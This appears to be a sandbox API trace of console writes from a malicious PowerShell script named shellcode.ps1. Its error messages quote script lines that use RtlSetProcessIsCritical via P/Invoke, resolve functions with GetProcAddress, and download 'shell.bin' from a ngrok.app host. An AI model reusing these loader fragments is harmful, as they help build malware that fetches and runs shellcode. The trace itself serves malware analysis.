WriteConsoleW
|
buffer:
Cannot convert argument "3", with value: "Winapi", for "DefinePInvokeMethod" to
console_handle:
0x0000001b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
type "System.Reflection.CallingConventions": "Cannot convert value "Winapi" to
console_handle:
0x00000027
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
type "System.Reflection.CallingConventions". Error: "Invalid cast from 'System
console_handle:
0x00000033
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
.Runtime.InteropServices.CallingConvention' to 'System.Reflection.CallingConven
console_handle:
0x0000003f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
tions'.""
console_handle:
0x0000004b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:11 char:54
console_handle:
0x00000057
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $methodBuilder = $typeBuilder.DefinePInvokeMethod <<<< ('RtlSetProcessIsC
console_handle:
0x00000063
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ritical', 'ntdll.dll',
console_handle:
0x0000006f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : NotSpecified: (:) [], MethodException
console_handle:
0x0000007b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
console_handle:
0x00000087
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
You cannot call a method on a null-valued expression.
console_handle:
0x000000a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:20 char:27
console_handle:
0x000000b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $methodInfo.Invoke <<<< ($null, @($isCritical, $unknown1, $unknown2))
console_handle:
0x000000bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle:
0x000000cb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
eption
console_handle:
0x000000d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : InvokeMethodOnNull
console_handle:
0x000000e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio
console_handle:
0x00000103
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
n, script file, or operable program. Check the spelling of the name, or if a pa
console_handle:
0x0000010f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th was included, verify that the path is correct and try again.
console_handle:
0x0000011b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:79 char:39
console_handle:
0x00000127
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $kematianthegreat = (Invoke-WebRequest <<<< -UseBasicParsing "https://ratte.
console_handle:
0x00000133
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ngrok.app/main/shell.bin").Content
console_handle:
0x0000013f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C
console_handle:
0x0000014b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ommandNotFoundException
console_handle:
0x00000157
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x00000163
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Unable to index into an object of type System.Reflection.RuntimeMethodInfo.
console_handle:
0x00000183
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:47 char:41
console_handle:
0x0000018f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $result = $getProcAddressMethod[ <<<< 0].Invoke($null, @($handle, $ke
console_handle:
0x0000019b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
matian_func))
console_handle:
0x000001a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException
console_handle:
0x000001b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CannotIndex
console_handle:
0x000001bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Method invocation failed because [System.Runtime.InteropServices.HandleRef] doe
console_handle:
0x000001df
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
sn't contain a method named 'new'.
console_handle:
0x000001eb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:51 char:69
console_handle:
0x000001f7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $handleRef = [System.Runtime.InteropServices.HandleRef]::new <<<< ($n
console_handle:
0x00000203
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ull, $handle)
console_handle:
0x0000020f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept
console_handle:
0x0000021b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ion
console_handle:
0x00000227
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : MethodNotFound
console_handle:
0x00000233
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Unable to index into an object of type System.Reflection.RuntimeMethodInfo.
console_handle:
0x00000253
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:52 char:41
console_handle:
0x0000025f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $result = $getProcAddressMethod[ <<<< 0].Invoke($null, @($handleRef,
console_handle:
0x0000026b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$kematian_func))
console_handle:
0x00000277
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException
console_handle:
0x00000283
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CannotIndex
console_handle:
0x0000028f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Unable to index into an object of type System.Reflection.RuntimeMethodInfo.
console_handle:
0x000002af
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:47 char:41
console_handle:
0x000002bb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ $result = $getProcAddressMethod[ <<<< 0].Invoke($null, @($handle, $ke
console_handle:
0x000002c7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
matian_func))
console_handle:
0x000002d3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException
console_handle:
0x000002df
|
1
|
1 |
0
|